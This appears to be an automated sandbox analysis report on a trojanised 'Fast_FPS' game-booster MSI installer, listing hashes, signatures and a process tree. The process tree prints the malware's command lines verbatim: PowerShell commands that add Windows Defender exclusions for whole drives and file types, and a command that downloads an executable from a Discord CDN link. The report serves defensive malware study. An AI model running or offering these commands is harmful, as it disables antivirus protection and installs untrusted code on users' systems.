Analysis
Max time kernel: 48s
Max time network: 30s
Platform: windows7_x64
Resource: win7-20221111-en
Resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
Submitted: 31/12/2022, 15:30
Static task: static1
Behavioral task: behavioral1
  Sample: Fast_FPS_by_Untie.msi
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: Fast_FPS_by_Untie.msi
  Resource: win10v2004-20220812-en
General
Target: Fast_FPS_by_Untie.msi
Size: 408KB
MD5: b3fdf1a56d2b3a15b9b6cced090e2bbd
SHA1: 401d9a223d082b02c529db39c723d6cc00caabf0
SHA256: 0c93ad2770b6428e558ee08382ffb14d8faccad8932c9abb119b76badf08cba6
SHA512: 45b452f25e58d233e139c8bdc6fb35c22fe0fe1da3ec2918c11342d49fa4d383267ab83adabf5c0612572fc5dcec74c5205573cfd31b3df90489cc341f2f68ef
SSDEEP: 6144:uqtOIiRQYpgjpjew5LLyGx1qo8nyKx45qVv0ja+N5xBnYb0Y:uqtMRQ+gjpjegLyo8FsqV8jGbP
Malware Config
Signatures
Loads dropped DLL (1 IoC)
- PID 812, MsiExec.exe
Modifies file permissions (1 TTP, 2 IoCs)
- PID 1356, ICACLS.EXE
- PID 1052, ICACLS.EXE
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Drops file in Windows directory (11 IoCs)
- File opened for modification: C:\Windows\Installer\6c6b14.ipi (msiexec.exe)
- File opened for modification: C:\Windows\INF\setupapi.ev3 (DrvInst.exe)
- File opened for modification: C:\Windows\INF\setupapi.ev1 (DrvInst.exe)
- File opened for modification: C:\Windows\Installer\6c6b13.msi (msiexec.exe)
- File created: C:\Windows\Installer\6c6b14.ipi (msiexec.exe)
- File opened for modification: C:\Windows\Logs\DPX\setupact.log (EXPAND.EXE)
- File opened for modification: C:\Windows\INF\setupapi.dev.log (DrvInst.exe)
- File created: C:\Windows\Installer\6c6b13.msi (msiexec.exe)
- File opened for modification: C:\Windows\Installer\ (msiexec.exe)
- File opened for modification: C:\Windows\Installer\MSI6D54.tmp (msiexec.exe)
- File opened for modification: C:\Windows\Logs\DPX\setuperr.log (EXPAND.EXE)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies data under HKEY_USERS (43 IoCs)
Runs net.exe
Suspicious behavior: EnumeratesProcesses (12 IoCs)
- PID 1728, msiexec.exe
- PID 1728, msiexec.exe
- PID 1004, powershell.exe
- PID 1908, powershell.exe
- PID 780, powershell.exe
- PID 968, powershell.exe
- PID 1924, powershell.exe
- PID 912, powershell.exe
- PID 1676, powershell.exe
- PID 1704, powershell.exe
- PID 332, powershell.exe
- PID 1312, powershell.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of FindShellTrayWindow (3 IoCs)
- PID 1876, msiexec.exe
- PID 1876, msiexec.exe
- PID 1876, msiexec.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Process tree (each child process is indented under its parent):

C:\Windows\system32\msiexec.exe (PID 1876)
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Fast_FPS_by_Untie.msi
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe (PID 1728)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\syswow64\MsiExec.exe (PID 812)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 8C85DF4EAD915EDC31CF208938F3DD17
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\ICACLS.EXE (PID 1356)
      Command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
      - Modifies file permissions

    C:\Windows\SysWOW64\EXPAND.EXE (PID 1964)
      Command line: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
      - Drops file in Windows directory

    C:\Windows\syswow64\cmd.exe (PID 2004)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files\UntiePerformance - Copy - Copy.bat" "
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\net.exe (PID 756)
        Command line: NET FILE
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net1.exe (PID 1600)
          Command line: C:\Windows\system32\net1 FILE

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1924)
        Command line: powershell Set-ExecutionPolicy -Force -ExecutionPolicy Unrestricted
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 780)
        Command line: powershell Add-MpPreference -ExclusionPath D:\
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1908)
        Command line: powershell Add-MpPreference -ExclusionPath C:\
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 912)
        Command line: powershell Add-MpPreference -ExclusionPath E:\
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1004)
        Command line: powershell Add-MpPreference -ExclusionExtension exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 968)
        Command line: powershell Add-MpPreference -ExclusionProcess Fast_FPS.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1676)
        Command line: powershell Add-MpPreference -ExclusionExtension tmp
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1704)
        Command line: powershell Add-MpPreference -ExclusionExtension exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 332)
        Command line: powershell Add-MpPreference -ExclusionExtension bat
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1312)
        Command line: powershell Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/918358647397036053/973534551185973318/Fast_FPS.exe -OutFile C:\Fast_FPS.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (PID 920)
      Command line: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files"

    C:\Windows\SysWOW64\ICACLS.EXE (PID 1052)
      Command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\." /SETINTEGRITYLEVEL (CI)(OI)LOW
      - Modifies file permissions

C:\Windows\system32\vssvc.exe (PID 752)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\DrvInst.exe (PID 928)
  Command line: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003DC" "00000000000004A8"
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\explorer.exe (PID 1208)
  Command line: "C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE (PID 1432)
  Command line: C:\Windows\system32\AUDIODG.EXE 0x1c0
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
File: (path not recorded)
  Filesize: 863B
  MD5: f6377a186da24de5c0579131d3e914d5
  SHA1: 94d57adb5e80447a7d0645096a20ae9e08f5d353
  SHA256: 8bc9db6e3bad52a0456afbb2f1d2e511a3a7daa6c5af23fdaa9afdcf077f7c5c
  SHA512: 2380ca7762174ee27e87a41c36c8e66c3660417b1dc3018206bf1ebb501f90351cdbcf690e02ed331dfe896d3cc11b424a88c951dd21247d98b5a2f48c269053
File: C:\Users\Admin\AppData\Local\Temp\MW-461d725b-76ab-4755-8d8e-aacc63ba7a34\files\UntiePerformance - Copy - Copy.bat
  Filesize: 2KB
  MD5: 8bbbd92335d2779351ffcbe279696df6
  SHA1: cc15c9e1165d093f22f69221a7657e5e7585657b
  SHA256: f2be711af6168320ac273a0fcc66b41526d0c04fd9e20e9f4de34ef065b1b50a
  SHA512: f204e2bbc8c4c88322a1483b135c5198f39ba895c6b363dc81a3f2ffc3b10061d2d13dc7872e058dd2cc99a83b121a413148641174d57cbbcde25ae98cd5eace
File: (path not recorded)
  Filesize: 1KB
  MD5: 7b6266320d28a2f2e2066bbfc4c1cd3b
  SHA1: 7282f962c633626e62867b3522394f83fa15846d
  SHA256: 27aecc07ae3cb602dc4f64e41ddff441833980961bb4df46d60f1df6b8a6a269
  SHA512: a6a0d9919c7e4c88087a331e8117ac440979f0aeb30ccf70c32390fedfbedd517029e03365428150ebaf95e9a40c04511bbe1c93678d4a460241e1d408c5d13b
File: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: fa974bf6f81628f16eba74808a9ce87c
  SHA1: caf6f8005ab4ca9b92487cc218d581c3bbc14a1a
  SHA256: 3112307e028d88de5a9ab72794c7bc83b6b698c96a8a7d5cc3e339ba38aae5c2
  SHA512: eff9639c8838ecf8b004cefc5aea5d3fa347bb0efbb29cb2ed26bf4f3e870bc93149bbc6b02db335383df4c6d8e76f7c0ae20d8ceb65d5dc7cac7796e80d8b56
File: (path not recorded)
  Filesize: 208KB
  MD5: 4caaa03e0b59ca60a3d34674b732b702
  SHA1: ee80c8f4684055ac8960b9720fb108be07e1d10c
  SHA256: d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
  SHA512: 25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34